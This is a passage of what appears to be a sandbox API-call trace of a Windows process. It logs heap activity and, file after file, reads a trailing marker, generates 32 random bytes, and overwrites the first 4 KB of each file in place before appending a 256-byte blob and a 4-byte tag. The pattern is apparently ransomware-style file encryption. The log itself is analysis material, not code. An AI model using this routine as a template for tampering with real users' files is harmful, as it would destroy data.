returned 1 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.050] GetProcessHeap () returned 0x4f10000 [0085.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.050] GetProcessHeap () returned 0x4f10000 [0085.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.050] GetProcessHeap () returned 0x4f10000 [0085.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.050] GetProcessHeap () returned 0x4f10000 [0085.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.050] GetProcessHeap () returned 0x4f10000 [0085.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.050] GetProcessHeap () returned 0x4f10000 [0085.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.050] GetProcessHeap () returned 0x4f10000 [0085.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.050] SetFilePointerEx (in: hFile=0x9a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.050] WriteFile (in: hFile=0x9a8, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.050] WriteFile (in: hFile=0x9a8, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.050] GetProcessHeap () returned 0x4f10000 [0085.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.050] GetProcessHeap () returned 0x4f10000 [0085.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.050] GetProcessHeap () returned 0x4f10000 [0085.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.050] CloseHandle (hObject=0x9a8) returned 1 [0085.054] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 140 [0085.054] SetFilePointerEx (in: hFile=0x9ac, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.054] ReadFile (in: hFile=0x9ac, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.054] SetFilePointerEx (in: hFile=0x9ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.054] GetProcessHeap () returned 0x4f10000 [0085.054] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.054] GetProcessHeap () returned 0x4f10000 [0085.054] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.054] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.054] GetProcessHeap () returned 0x4f10000 [0085.054] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.054] ReadFile (in: hFile=0x9ac, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.105] SetFilePointerEx (in: hFile=0x9ac, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.105] WriteFile (in: hFile=0x9ac, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.106] GetProcessHeap () returned 0x4f10000 [0085.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.107] GetProcessHeap () returned 0x4f10000 [0085.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.108] GetProcessHeap () returned 0x4f10000 [0085.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.109] GetProcessHeap () returned 0x4f10000 [0085.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.110] GetProcessHeap () returned 0x4f10000 [0085.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.110] GetProcessHeap () returned 0x4f10000 [0085.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.110] GetProcessHeap () returned 0x4f10000 [0085.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.110] GetProcessHeap () returned 0x4f10000 [0085.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.110] GetProcessHeap () returned 0x4f10000 [0085.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.110] GetProcessHeap () returned 0x4f10000 [0085.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.110] SetFilePointerEx (in: hFile=0x9ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.110] WriteFile (in: hFile=0x9ac, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.110] WriteFile (in: hFile=0x9ac, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.110] GetProcessHeap () returned 0x4f10000 [0085.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.110] GetProcessHeap () returned 0x4f10000 [0085.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.110] GetProcessHeap () returned 0x4f10000 [0085.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.110] CloseHandle (hObject=0x9ac) returned 1 [0085.112] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 141 [0085.112] SetFilePointerEx (in: hFile=0x9b0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.112] ReadFile (in: hFile=0x9b0, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.112] SetFilePointerEx (in: hFile=0x9b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.112] GetProcessHeap () returned 0x4f10000 [0085.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.112] GetProcessHeap () returned 0x4f10000 [0085.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.112] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.112] GetProcessHeap () returned 0x4f10000 [0085.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.112] ReadFile (in: hFile=0x9b0, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.163] SetFilePointerEx (in: hFile=0x9b0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.163] WriteFile (in: hFile=0x9b0, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.163] GetProcessHeap () returned 0x4f10000 [0085.163] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.163] GetProcessHeap () returned 0x4f10000 [0085.163] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.163] GetProcessHeap () returned 0x4f10000 [0085.163] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.163] GetProcessHeap () returned 0x4f10000 [0085.163] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.163] GetProcessHeap () returned 0x4f10000 [0085.163] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.163] GetProcessHeap () returned 0x4f10000 [0085.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.164] GetProcessHeap () returned 0x4f10000 [0085.165] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.165] GetProcessHeap () returned 0x4f10000 [0085.165] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.165] GetProcessHeap () returned 0x4f10000 [0085.165] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.165] GetProcessHeap () returned 0x4f10000 [0085.165] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.165] GetProcessHeap () returned 0x4f10000 [0085.165] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.165] GetProcessHeap () returned 0x4f10000 [0085.165] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.165] GetProcessHeap () returned 0x4f10000 [0085.165] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.165] GetProcessHeap () returned 0x4f10000 [0085.165] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.165] GetProcessHeap () returned 0x4f10000 [0085.165] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.165] GetProcessHeap () returned 0x4f10000 [0085.165] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.165] GetProcessHeap () returned 0x4f10000 [0085.165] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: 